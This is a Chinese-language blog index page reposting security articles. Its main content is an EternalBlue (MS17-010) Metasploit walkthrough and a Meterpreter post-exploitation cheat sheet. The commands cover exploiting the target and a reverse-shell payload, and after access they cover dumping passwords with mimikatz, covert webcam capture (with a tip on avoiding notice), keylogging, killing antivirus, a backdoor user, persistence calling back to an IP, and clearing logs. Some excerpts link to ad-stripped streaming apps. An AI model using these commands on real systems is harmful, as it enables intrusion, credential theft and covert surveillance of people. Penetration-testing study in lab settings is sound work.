PIXNET Logo登入

好康搬運工

跳到主文

只是備份網路好文章無營利及其他用途

部落格全站分類:數位生活

  • 相簿
  • 部落格
  • 留言
  • 名片
  • 7月 01 週四 202117:39

  • 永恆之藍復現(CVE-2017-0146)

永恆之藍復現(CVE-2017-0146)

作者:煩惱隨風飄 時間: 2021-06-26 09:06:19
標簽:漏洞復現
【摘要】 文章目錄 測試環境操作步驟在Meterpreter上的一些別的操作 測試環境 靶機 Server 2008 R2 攻擊機kali 操作步驟 1、啟動msf msfconsole ...

文章目錄

    • 測試環境
    • 操作步驟
    • 在Meterpreter上的一些別的操作

測試環境

靶機 Server 2008 R2
攻擊機kali

操作步驟

1、啟動msf

msfconsole

永恆之藍復現(CVE-2017-0146)1
2、搜索 ms17-010 模塊

search ms17-010

永恆之藍復現(CVE-2017-0146)2
1、利用模塊1來檢測是否有此漏洞

use auxiliary/scanner/smb/smb_ms17_010 set rhost 受害者IP run

永恆之藍復現(CVE-2017-0146)3

2、利用模塊2來進行攻擊
查看需要配置的信息

use exploit/windows/smb/ms17_010_eternalblue 
show options

永恆之藍復現(CVE-2017-0146)4
設置受害者的IP:

set rhost 受害者IP

設置監聽者IP

set lhost 監聽者KaliIP

設置payload

set payload windows/x64/meterpreter/reverse_tcp

啟動 run 或exploit

run

拿shell
永恆之藍復現(CVE-2017-0146)5
解決亂碼情況

chcp 65001

永恆之藍復現(CVE-2017-0146)6

在Meterpreter上的一些別的操作

1、截屏

screenshot

永恆之藍復現(CVE-2017-0146)7
2、獲取系統密碼
加載mimikatz模塊

load mimikatz

永恆之藍復現(CVE-2017-0146)8
獲取用戶密碼

wdigest

永恆之藍復現(CVE-2017-0146)9
3、開啟攝像頭
檢測有沒有攝像頭

webcam_list

永恆之藍復現(CVE-2017-0146)10
打開攝像頭

webcam_stream

打開攝像頭,燈會一直亮著,容易被發現
永恆之藍復現(CVE-2017-0146)11
Ctrl + C 退出,(關閉攝像頭)
永恆之藍復現(CVE-2017-0146)12
拍照

webcam_snap

拍照,攝像頭的燈只是一閃而過。沒那麼容易發現
永恆之藍復現(CVE-2017-0146)13

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(0)

  • 個人分類:Metasploit
▲top
  • 7月 01 週四 202117:04

  • Metasploit-advanced user password and mimikatz module kiwi module

Metasploit

1. Basic

1. Grab the password for automatic login

run windows/gather/credentials/windows_autologin
  • 1

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(33)

  • 個人分類:Metasploit
▲top
  • 7月 01 週四 202112:11

  • Metasploit簡單使用——後滲透階段

 

Metasploit簡單使用——後滲透階段 一、meterperter常用命令 sysinfo #檢視目標主機系統資訊 run scraper #檢視目標主機詳細資訊 run hashdump #匯出密碼的雜湊 load kiwi #載入mimikatz ps #檢視目標主機程式資訊 pwd #檢視目標當前目錄(windows) getlwd #檢視目標當前目錄(Linux) search -f *.jsp -d e:\ #搜尋E盤中所有以.jsp為字尾的檔案 download e:\test.txt /root #將目標機的e:\test.txt檔案下載到/root目錄下 upload /root/test.txt d:\test #將/root/test.txt上傳到目標機的 d:\test\ 目錄下 getpid #檢視當前Meterpreter Shell的程式PID migrate 1384 #將當前Meterpreter Shell的程式遷移到PID為1384的程式上 idletime #檢視主機執行時間 getuid #檢視獲取的當前許可權 getsystem #提權 run killav/run post/windows/manage/killav #關閉防毒軟體 screenshot #截圖 webcam_list #檢視目標主機的攝像頭 webcam_snap #拍照 webcam_stream #開視訊 execute 引數 -f 可執行檔案 #執行可執行程式 run getgui -u hack -p 123 #建立hack使用者,密碼為123 run getgui -e #開啟遠端桌面 keyscan_start #開啟鍵盤記錄功能 keyscan_dump #顯示捕捉到的鍵盤記錄資訊 keyscan_stop #停止鍵盤記錄功能 uictl disable keyboard #禁止目標使用鍵盤 uictl enable keyboard #允許目標使用鍵盤 uictl disable mouse #禁止目標使用滑鼠 uictl enable mouse #允許目標使用滑鼠 load #使用擴充套件庫 run #使用擴充套件庫 run persistence -X -i 5 -p 8888 -r 192.168.1.114 #反彈時間間隔是5s 會自動連線192.168.1.114的4444埠,缺點是容易被防毒軟體查殺 portfwd add -l 3389 -r 192.168.11.13 -p 3389 #將192.168.11.13的3389埠轉發到本地的3389埠上,這裡的192.168.11.13是獲取許可權的主機的ip地址 clearev #清除日誌

 

 二、Post 後滲透模組

該模組主要用於在取得目標主機系統遠端控制權後,進行一系列的後滲透攻擊動作。

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(4)

  • 個人分類:Metasploit
▲top
  • 6月 24 週四 202114:18

  • 一帆視頻 APK,手機/TV盒子版,影視APP

一帆視頻 APK,手機/TV盒子版,影視APP
官方網站:https://www.ifsp.tv/
IOS蘋果安裝 / Android安卓  :https://www.ifsp.tv/help/app-download
 

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(1,470)

  • 個人分類:
▲top
  • 6月 24 週四 202114:15

  • Kali

https://www.kali.org/get-kali/

undefined

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(0)

  • 個人分類:hack
▲top
  • 6月 24 週四 202114:12

  • Parrot OS

https://www.parrotsec.org/

 

undefined

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(0)

  • 個人分類:hack
▲top
  • 6月 20 週日 202114:22

  • Fortigate 2FA with e-mail

登入Fortigate CLI

允許2FA透過Email派發
config user local
edit "Carmen"
set type password
set two-factor email
set email-to "carmen@nasa.gov"
next
end

增加token存活時間
config system global
set two-factor-email-expiry <30-300>
next
end

增加user輸入token時間
config system global
set remoteauthtimeout <1-300>

 

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(0)

  • 個人分類:
▲top
  • 6月 20 週日 202110:14

  • NFMovies奈菲影視 免費在線影視APP去廣告版

undefined

NF movie TV去廣告版【TV端】:https://hefen.lanzoui.com/iYWdcqhahoj
NF movie TV去廣告版(另一版)【TV端】:https://hefen.lanzoui.com/iBWrfqhkgaj

(繼續閱讀...)
文章標籤

好康搬運工 發表在 痞客邦 留言(0) 人氣(7)

  • 個人分類:
▲top
«1...45

個人資訊

好康搬運工
暱稱:
好康搬運工
分類:
數位生活
好友:
累積中
地區:

熱門文章

  • ()NFMovies奈菲影視 免費在線影視APP去廣告版
  • ()一帆視頻 APK,手機/TV盒子版,影視APP
  • ()Metasploit-advanced user password and mimikatz module kiwi module
  • ()Windows 10 自黏便箋(便利貼)-sticky notes
  • ()破解 TPM 電腦安裝 Windows 11
  • ()WINDOWS日誌事件ID速查表
  • ()如何檢測Windows中的橫向滲透攻擊
  • ()攻擊檢測之域權限維持
  • ()攻擊檢測之域權限維持
  • ()破解痞客邦 pixnet 複製/貼上/鎖右鍵

文章分類

  • hack (4)
  • Metasploit (6)
  • WAF (2)
  • Audit (2)
  • Phishing email (2)
  • Windows10 (4)
  • 算命 (2)
  • 資訊安全 (4)
  • 資訊安全 (12)
  • 防禦分析 (2)
  • Vmware WorkStation (2)
  • synology (2)
  • 未分類文章 (1)

最新文章

    動態訂閱

    文章精選

    文章搜尋

    誰來我家

    參觀人氣

    • 本日人氣:
    • 累積人氣: